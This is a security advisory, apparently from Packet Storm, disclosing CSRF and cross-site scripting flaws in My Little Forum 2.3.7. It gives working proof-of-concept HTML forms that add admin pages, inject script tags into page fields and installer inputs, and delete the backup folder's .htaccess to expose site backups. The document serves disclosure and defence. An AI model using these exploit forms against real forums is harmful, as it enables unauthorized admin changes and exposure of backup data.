My Little Forum 2.3.7 Cross Site Request Forgery / Cross Site Scripting

2016-11-01T00:00:00
ID PACKETSTORM:139462
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2016-11-01T00:00:00

Description

                                        
                                            `Title:  
======  
My Little Forum 2.3.7 - Multiple Vulnerability  
  
  
Product & Service Introduction:  
===============================  
My little forum is a simple PHP and MySQL based internet forum that   
displays the messages in classical threaded view (tree structure). It is   
Open Source licensed under the GNU General Public License. The main   
claim of this web forum is simplicity. Furthermore it should be easy to   
install and run on a standard server configuration with PHP and MySQL.  
  
  
Software Link:  
==============  
https://github.com/ilosuna/mylittleforum/archive/master.zip  
  
  
Vulnerability Type:  
=========================  
Cross-Site Request Forgery  
Stored Cross-Site Scripting  
CSRF Allow To Backup Disclosure  
  
  
Vulnerability Details:  
==============================  
This WebApplication is vulnerable and suffer from some vulnerablity.  
  
  
Severity Level:  
===============  
High  
  
  
Proof of Concept (PoC):  
=======================  
1. CSRF (Add Page)  
With this exploit can add page in webapp.  
<form   
action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page"   
method="post" accept-charset="utf-8">  
<input type="hidden" name="mode" value="admin">  
<input type="hidden" name="title" value="Title">  
<input type="hidden" name="content" value="Content">  
<input type="hidden" name="menu_linkname" value="Name">  
<input type="submit" name="edit_page_submit" value="OK - Save page">  
</form>  
  
  
2. Stored XSS:  
<form   
action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page"   
method="post" accept-charset="utf-8">  
<input type="hidden" name="mode" value="admin">  
<input type="hidden" name="title" value="Stored XSS   
<script>alert(1)</script>">  
<input type="hidden" name="content" value="Stored XSS   
<script>alert(2)</script>">  
<input type="hidden" name="menu_linkname" value="Stored XSS   
<script>alert(3)</script>">  
<input type="submit" name="edit_page_submit" value="OK - Save page">  
</form>  
  
3. Backup Disclosure:  
with this exploit we can delect htaccess in backup folder for access to   
backups.  
<form action="http://localhost/mylittleforum-master/index.php"   
method="post" accept-charset="utf-8">  
<div>  
<input type="hidden" name="mode" value="admin">  
<input type="hidden" name="delete_backup_files[]" value=".htaccess">  
<input type="submit" name="delete_backup_files_confirm" value="OK - Delete">  
</div>  
</form>  
Next use exploit go to:  
http://localhost/mylittleforum-master/backup/  
  
  
  
Author:  
==================  
Ashiyane Digital Security Team  
  
  
=======================  
  
Title:  
======  
My Little Forum 2.3.7 (Installer) - Cross-Site Scripting  
  
  
Product & Service Introduction:  
===============================  
My little forum is a simple PHP and   
MySQL based internet forum that displays the messages in classical threaded view   
(tree structure). It is Open Source licensed under the GNU General   
Public License. The main claim of this web forum is simplicity.   
Furthermore it should be easy to install and   
run on a standard server configuration with PHP and MySQL.  
  
  
Software Link:  
==============  
https://github.com/ilosuna/mylittleforum/archive/master.zip  
  
  
Vulnerability Type:  
=========================  
Cross-Site Scripting  
  
  
Vulnerability Details:  
==============================  
Installer of My Little Forum is vulnerable to cross-site scripting.  
  
  
Proof of Concept (PoC):  
=======================  
<html>  
<body>  
<form action="http://localhost/mylittleforum-master/install/index.php"   
method="post">  
<input type="text" name="forum_name" value='"><script>alert(1)</script>'>  
<input type="text" name="forum_address" value='"><script>alert(2)</script>'>  
<input type="text" name="forum_email" value='"><script>alert(3)</script>'>  
<input type="text" name="admin_name" value='"><script>alert(4)</script>'>  
<input type="text" name="admin_email" value='"><script>alert(5)</script>'>  
<input type="text" name="host" value='"><script>alert(6)</script>'>  
<input type="text" name="database" value='"><script>alert(7)</script>'>  
<input type="text" name="user" value='"><script>alert(8)</script>'>  
<input type="text" name="table_prefix" value='"><script>alert(9)</script>'>  
<input type="submit" name="install_submit" value="OK - Install forum">  
<input type="hidden" name="language_file" value="english.lang">  
</form>  
</body>  
</html>  
  
  
  
Author:  
==================  
Ashiyane Digital Security Team ||  
  
`